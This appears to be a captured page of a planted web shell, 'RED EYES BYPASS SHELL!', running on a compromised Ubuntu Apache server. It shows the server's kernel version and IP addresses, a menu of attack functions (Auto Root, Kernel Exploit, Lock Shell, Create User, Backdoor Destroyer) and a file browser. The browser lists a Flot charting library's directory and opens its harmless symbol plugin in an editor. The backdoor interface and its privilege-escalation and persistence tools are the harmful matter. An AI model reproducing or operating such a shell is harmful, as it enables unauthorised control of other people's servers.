Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
app /
bower_components /
Flot /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
examples
[ DIR ]
drwxr-xr-x
.bower.json
415
B
-rwxr-xr-x
.gitignore
40
B
-rwxr-xr-x
.travis.yml
35
B
-rwxr-xr-x
API.md
52.32
KB
-rwxr-xr-x
CONTRIBUTING.md
3.17
KB
-rwxr-xr-x
FAQ.md
3.16
KB
-rwxr-xr-x
LICENSE.txt
1.04
KB
-rwxr-xr-x
Makefile
285
B
-rwxr-xr-x
NEWS.md
39.35
KB
-rwxr-xr-x
PLUGINS.md
4.24
KB
-rwxr-xr-x
README.md
3.69
KB
-rwxr-xr-x
component.json
114
B
-rwxr-xr-x
excanvas.js
40.96
KB
-rwxr-xr-x
excanvas.min.js
18.86
KB
-rwxr-xr-x
flot.jquery.json
837
B
-rwxr-xr-x
jquery.colorhelpers.js
6.01
KB
-rwxr-xr-x
jquery.flot.canvas.js
9.37
KB
-rwxr-xr-x
jquery.flot.categories.js
5.89
KB
-rwxr-xr-x
jquery.flot.crosshair.js
5.29
KB
-rwxr-xr-x
jquery.flot.errorbars.js
12.32
KB
-rwxr-xr-x
jquery.flot.fillbetween.js
5.13
KB
-rwxr-xr-x
jquery.flot.image.js
7.19
KB
-rwxr-xr-x
jquery.flot.js
120.09
KB
-rwxr-xr-x
jquery.flot.navigate.js
13.88
KB
-rwxr-xr-x
jquery.flot.pie.js
23.25
KB
-rwxr-xr-x
jquery.flot.resize.js
3.24
KB
-rwxr-xr-x
jquery.flot.selection.js
12.83
KB
-rwxr-xr-x
jquery.flot.stack.js
6.92
KB
-rwxr-xr-x
jquery.flot.symbol.js
2.45
KB
-rwxr-xr-x
jquery.flot.threshold.js
4.38
KB
-rwxr-xr-x
jquery.flot.time.js
11.49
KB
-rwxr-xr-x
jquery.js
259.82
KB
-rwxr-xr-x
package.json
154
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.flot.symbol.js
/* Flot plugin that adds some extra symbols for plotting points. Copyright (c) 2007-2014 IOLA and Ole Laursen. Licensed under the MIT license. The symbols are accessed as strings through the standard symbol options: series: { points: { symbol: "square" // or "diamond", "triangle", "cross" } } */ (function ($) { function processRawData(plot, series, datapoints) { // we normalize the area of each symbol so it is approximately the // same as a circle of the given radius var handlers = { square: function (ctx, x, y, radius, shadow) { // pi * r^2 = (2s)^2 => s = r * sqrt(pi)/2 var size = radius * Math.sqrt(Math.PI) / 2; ctx.rect(x - size, y - size, size + size, size + size); }, diamond: function (ctx, x, y, radius, shadow) { // pi * r^2 = 2s^2 => s = r * sqrt(pi/2) var size = radius * Math.sqrt(Math.PI / 2); ctx.moveTo(x - size, y); ctx.lineTo(x, y - size); ctx.lineTo(x + size, y); ctx.lineTo(x, y + size); ctx.lineTo(x - size, y); }, triangle: function (ctx, x, y, radius, shadow) { // pi * r^2 = 1/2 * s^2 * sin (pi / 3) => s = r * sqrt(2 * pi / sin(pi / 3)) var size = radius * Math.sqrt(2 * Math.PI / Math.sin(Math.PI / 3)); var height = size * Math.sin(Math.PI / 3); ctx.moveTo(x - size/2, y + height/2); ctx.lineTo(x + size/2, y + height/2); if (!shadow) { ctx.lineTo(x, y - height/2); ctx.lineTo(x - size/2, y + height/2); } }, cross: function (ctx, x, y, radius, shadow) { // pi * r^2 = (2s)^2 => s = r * sqrt(pi)/2 var size = radius * Math.sqrt(Math.PI) / 2; ctx.moveTo(x - size, y - size); ctx.lineTo(x + size, y + size); ctx.moveTo(x - size, y + size); ctx.lineTo(x + size, y - size); } }; var s = series.points.symbol; if (handlers[s]) series.points.symbol = handlers[s]; } function init(plot) { plot.hooks.processDatapoints.push(processRawData); } $.plot.plugins.push({ init: init, name: 'symbols', version: '1.0' }); })(jQuery);
Close